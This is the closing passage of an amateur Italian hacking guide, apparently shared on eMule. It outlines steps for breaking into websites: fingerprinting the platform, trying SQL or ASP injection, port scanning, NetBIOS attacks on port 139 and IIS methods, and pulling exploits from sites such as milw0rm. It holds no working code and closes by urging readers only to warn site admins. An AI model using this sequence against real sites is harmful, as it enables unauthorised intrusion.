Ok,ora vediamo subito se il nostro sito è PHP-NUKE,ASP,HTML,PL Ecc
Se è PHP-NUKE proviamo subito con gli SQL-INJECTION
Se si tratta di un sito in ASP proviamo con ASP-INJECTION
Bhè se nel caso non funge ne SQL-INJECTION ne ASP-INJECTION
Possiamo provare con il PUB SCAN oppure la SHELL!
Se manco questo va si usa
Cominciamo a scannerizzare il sito!
Dopo troviamo le vulnerabilità su quei tipi di SERVIZI
(PORTE APERTE OGNI PORTA è UN SERVIZIO 80=HTTP ECC)
Se poi ha la porta 139aperta possiamo provare ad attakkare
tramite NETBIOS!
Poi se ha il servizio IIS utilizziamo i metodi del capitolo 7!
In ogni caso,per ogni cosa utilizziamo sempre Exploit!
Andate su:
www.milw0rm.com
www.securityreason.com
ecc per trovare VULNERABILITà,EXPLOIT e BUG!
Quindi cercate i servizi,nome di un modulo,oppure
se trovate POWERED BY...dovete tener conto di tutto
e cercare exploit che servano per un servizio ecc!
Bhè che dire,questa GRANDE GUIDA è finita!
Spero TANTO che vi sia servita e che sia stato chiaro!
Ciao a tutti!
Ricordate di non fare lamerate o delettare interi siti ma solo
avvisare l'admin della falla
Guida presa da eMule!!